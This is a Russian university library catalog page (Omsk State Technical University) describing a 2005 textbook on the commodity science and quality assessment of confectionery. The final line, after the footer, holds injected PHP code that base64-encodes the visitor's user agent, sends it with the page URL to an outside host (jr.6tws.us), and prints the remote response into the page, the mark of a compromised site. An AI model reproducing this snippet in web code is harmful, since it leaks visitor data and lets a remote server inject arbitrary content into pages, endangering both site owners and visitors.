Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

110 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=658.6/.8/Р93-793986824")
Результаты поиска
E_OMSTU: Найдено записей: 1
1. 
658.6/.8/Р93-793986824
658.6/.8/Р93
Рыжакова, Алла Владимировна.
Товароведение и экспертиза кондитерских товаров [Текст] : учеб. для вузов по специальности "Товароведение и экспертиза товаров" / А. В. Рыжакова ; дар. О. Д. Худякова. - М. : Академия , 2005. - 222, [1] с. : рис., табл. - (Высшее профессиональное образование). - Библиогр.: с. 221. - ISBN 5-7695-1982-7 : 100.00 р.

УДК 658.62(075) + 664.14(075)

Рубрики:
Кондитерские изделия -- Товароведение -- Экспертиза -- Учебники и пособия
Товароведение -- Продовольственные товары -- Учебники и пособия

Кл.слова (ненормированные): УЧЕБНИК И ПОСОБИЕ * -- КРАХМАЛ -- САХАР -- МЕД -- ШОКОЛАД -- КОНФЕТА -- ПЕЧЕНЬЕ -- ХАЛВА -- КАКАО -- ЭМУЛЬГАТОР -- ПОВИДЛО -- ДЖЕМ -- ПАСТИЛА -- МАРМЕЛАД -- ВАРЕНЬЕ
Аннотация: Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.
Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".
Доп. точки доступа:
Худякова, О. Д.дар.
Экз-ры полностью 658.6/.8/Р93-793986824
Имеются экземпляры в отделах:
ИДТ (19.07.2018г. Инв.620626 - 100.00 р.) - свободен
Экземпляры 
    Место храненияЭкземпляров
    ВсегоСвободно
    ИДТ11

Изложены основные сведения о сырье и вспомогательных материалах, пищевых добавках, особенностях технологии производства сахаристых и мучных кондитерских изделий. Приведены информация о составе, свойствах и пищевой ценности; принципы товарной классификации и ассортиментной принадлежности; требования к качеству, маркировке, транспортированию, условиям хранения изделий. Рассмотрены процессы, протекающие при производстве и хранении, их влияние на качество изделий.

Для студентов высших учебных заведений, обучающихся по специальности "Товароведение и экспертиза товаров".

вернуться


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2993 - 20.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.74 с.8 запросов, 0.47c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;